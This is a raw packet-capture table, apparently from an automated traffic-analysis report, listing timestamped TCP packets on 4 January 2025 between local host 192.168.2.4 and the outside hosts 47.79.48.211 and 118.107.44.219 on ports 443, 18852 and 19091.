                                                                                                                          Jan 4, 2025 05:38:28.618700027 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.634305954 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.634325027 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.634377003 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.634382010 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.634411097 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.634423018 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.662036896 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662059069 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662113905 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.662121058 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662158966 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.662504911 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662523985 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662576914 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.662581921 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.662621021 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.676048994 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.676074028 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.676116943 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.676124096 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.676156998 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.676175117 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.685029984 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.685046911 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.685110092 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.685117960 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.685147047 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.685164928 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.694176912 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.694194078 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.694258928 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.694264889 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.694303989 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.705379963 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.705403090 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.705466032 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.705472946 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.705503941 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.705518961 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.710325956 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.710341930 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.710412979 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.710419893 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.710468054 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.726042032 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.726062059 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.726114988 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.726121902 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.726161003 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.753963947 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.753987074 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.754060030 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.754075050 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.754117966 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.754455090 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.754470110 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.754544973 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.754549980 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.754575968 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.754590034 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.774101019 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774122953 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774173975 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.774184942 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774203062 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774224997 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.774250984 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.774256945 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774317026 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:28.774348021 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.774358034 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.775794983 CET49735443192.168.2.447.79.48.211
                                                                                                                          Jan 4, 2025 05:38:28.775815964 CET4434973547.79.48.211192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:47.559597015 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:47.564543009 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:47.564637899 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.339589119 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339612007 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339622974 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339633942 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339647055 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339704037 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.339732885 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339744091 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.339746952 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339761019 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339773893 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.339773893 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339787006 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.339802027 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.339828014 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.344667912 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.344681978 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.344697952 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.344707012 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.344780922 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.543798923 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543816090 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543854952 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543867111 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543874025 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.543879032 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543916941 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.543931007 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543947935 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.543956995 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.544048071 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.544713020 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.544734001 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.544745922 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.544779062 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.544781923 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.544822931 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.545413971 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545425892 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545438051 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545454025 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545458078 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.545468092 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545480967 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.545506954 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.545526981 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.546395063 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546407938 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546418905 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546428919 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546442986 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546451092 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.546452999 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.546464920 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.546514034 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.749938965 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.749963999 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.749977112 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.749995947 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750030994 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.750065088 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.750068903 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750082970 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750096083 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750121117 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.750214100 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750227928 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750240088 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750251055 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.750255108 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750279903 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.750384092 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.750421047 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.751198053 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751210928 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751224041 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751235962 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751247883 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751254082 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.751260996 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751275063 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751291037 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.751319885 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.751341105 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.751384020 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.752136946 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752150059 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752161026 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752177954 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.752288103 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752300978 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752314091 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752326965 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752326965 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.752350092 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.752446890 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752486944 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.752917051 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752965927 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752979040 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.752990007 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.753010035 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.753045082 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952344894 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952373981 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952385902 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952403069 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952414989 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952425957 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952431917 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952439070 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952470064 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952476978 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952615023 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952627897 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952646971 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952655077 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952688932 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952789068 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952800989 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952812910 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952822924 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952835083 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.952841043 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.952878952 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.953454018 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953465939 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953478098 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953497887 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.953522921 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.953536034 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953547955 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953557968 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953574896 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953599930 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.953614950 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.953629971 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953641891 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.953680992 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.954508066 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954520941 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954531908 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954544067 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954555035 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.954555988 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954569101 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954580069 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.954583883 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.954605103 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.955034971 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.955060959 CET1885249742118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:48.955079079 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:48.955106020 CET4974218852192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:50.988189936 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:50.992949963 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:50.993030071 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:50.993381977 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:50.998198032 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:51.880600929 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:51.881011009 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:51.885925055 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:51.885936975 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:51.885950089 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.196970940 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197033882 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197066069 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197077990 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197088003 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197098970 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197117090 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.197166920 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.197170019 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197184086 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197194099 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197204113 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.197221041 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.197251081 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.197859049 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.202003956 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.202053070 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.416498899 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416512966 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416523933 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416569948 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.416651964 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416661978 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416698933 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.416922092 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416961908 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416971922 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.416975975 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.417016983 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.417427063 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.417437077 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.417454004 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.417464972 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.417474985 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.417479992 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.417499065 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.418303967 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.418320894 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.418334007 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.418344021 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.418345928 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.418354034 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.418387890 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.418411970 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.419157028 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.419167042 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.419178009 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.419192076 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.419202089 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.419207096 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.419241905 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.635940075 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.635967016 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.635978937 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.635984898 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.635992050 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.635998011 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636004925 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636143923 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.636279106 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636290073 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636301994 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636322021 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.636348963 CET4974319091192.168.2.4118.107.44.219
                                                                                                                          Jan 4, 2025 05:38:52.636365891 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636377096 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636389971 CET1909149743118.107.44.219192.168.2.4
                                                                                                                          Jan 4, 2025 05:38:52.636401892 CET1909149743118.107.44.219192.168.2.4
